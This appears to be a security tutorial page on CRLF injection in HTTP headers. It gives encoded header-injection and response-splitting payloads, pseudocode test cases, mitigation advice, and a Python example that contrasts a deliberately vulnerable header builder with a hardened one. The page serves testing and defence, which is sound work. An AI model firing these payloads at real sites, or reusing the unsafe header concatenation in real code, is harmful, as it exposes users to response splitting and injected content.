CRLF Injection

Description

CRLF (Carriage Return Line Feed) Injection occurs when an attacker can inject CRLF characters into HTTP headers, potentially leading to HTTP response splitting, header injection, or other malicious actions.

Example with Scenario

Scenario: A web application copies user input into an HTTP header it generates (for example a redirect target or a cookie value). Because CR and LF terminate header lines, an attacker who can get those characters into the input can append extra headers or terminate the header block early and split the response, which is the basis of the header-injection and response-splitting attacks below.

Payloads and Test Cases

Payloads

  1. Header Injection:

    %0D%0AInjected-Header: injected
  2. HTTP Response Splitting:

    %0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A<h1>Injected Content</h1>

Test Cases

  1. Header Injection:

    • Payload:

      %0D%0AInjected-Header: injected
    • Test Case:

      # Send payload to the server
      sendPayloadToServer("input=%0D%0AInjected-Header: injected")
      # Verify if the application includes the injected header
      checkForInjectedHeader("Injected-Header", "injected")
  2. HTTP Response Splitting:

    • Payload:

      %0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A<h1>Injected Content</h1>
    • Test Case:

      # Send payload to the server
      sendPayloadToServer("input=%0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A<h1>Injected Content</h1>")
      # Verify if the application splits the HTTP response
      checkForInjectedContent("<h1>Injected Content</h1>")

Mitigation

  1. Input Validation:

    • Validate user input and reject any value that still contains CR or LF characters (%0D, %0A in encoded form) after it has been decoded and before it is placed in a header.

    • Prefer allow-list validation of the expected format (for example, only the characters a path or token may legitimately contain) over attempting to strip known-bad characters.

  2. Use Libraries:

    • Use libraries and frameworks that automatically handle header encoding and prevent injection.

    • Avoid constructing HTTP headers manually using user input.

  3. Secure Headers:

    • Set secure HTTP headers to mitigate the impact of potential CRLF injection.

    • Use Content Security Policy (CSP) and other security headers to protect the application.

  4. Error Handling:

    • Implement proper error handling to avoid revealing header information in error messages.

    • Return generic error messages without disclosing sensitive details.
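As an added example that is not part of the original page: a naive header builder placed beside a hardened one in Python, exercised with the page's own URL-encoded payloads. The redirect scenario and all function names here are assumptions for illustration.

```python
# Added example (not from the original page): a vulnerable header builder next
# to a hardened one, run against the page's URL-encoded CRLF payloads.
from urllib.parse import unquote

CRLF = "\r\n"


def contains_crlf(user_input: str) -> bool:
    """True if the value, once URL-decoded, still carries CR, LF or NUL.

    The check runs after decoding because that is the form in which the value
    would be written into the header block.
    """
    decoded = unquote(user_input)
    return any(ch in decoded for ch in ("\r", "\n", "\0"))


def build_response_unsafe(user_input: str) -> bytes:
    """Vulnerable: the decoded input is concatenated straight into a header."""
    value = unquote(user_input)  # %0D%0A becomes a real "\r\n" here
    head = "HTTP/1.1 302 Found" + CRLF + "Location: " + value + CRLF + CRLF
    return head.encode("utf-8")


def build_response_safe(user_input: str) -> bytes:
    """Hardened: the value is rejected (not silently stripped) if it carries CR/LF."""
    if contains_crlf(user_input):
        raise ValueError("CR/LF not allowed in header value")
    head = "HTTP/1.1 302 Found" + CRLF + "Location: " + unquote(user_input) + CRLF + CRLF
    return head.encode("utf-8")


def header_lines(raw: bytes) -> list[str]:
    """Split the header block into lines, as a client would, so a test can count them."""
    block = raw.split(b"\r\n\r\n", 1)[0]
    return block.decode("utf-8").split("\r\n")


# Constructed inputs: a benign path and the page's two payloads appended to it.
BENIGN = "/home"
HEADER_INJECTION = "/home%0D%0AInjected-Header: injected"
RESPONSE_SPLITTING = (
    "/home%0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK"
    "%0D%0AContent-Type: text/html%0D%0A%0D%0A<h1>Injected Content</h1>"
)

if __name__ == "__main__":
    print(header_lines(build_response_unsafe(HEADER_INJECTION)))  # extra header appears
    for payload in (HEADER_INJECTION, RESPONSE_SPLITTING):
        try:
            build_response_safe(payload)
        except ValueError as exc:
            print("rejected:", exc)
```

Raising on a bad value rather than stripping CR/LF keeps the rejection visible in application logs, which is also the signal a detection rule for this class of input can key on.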
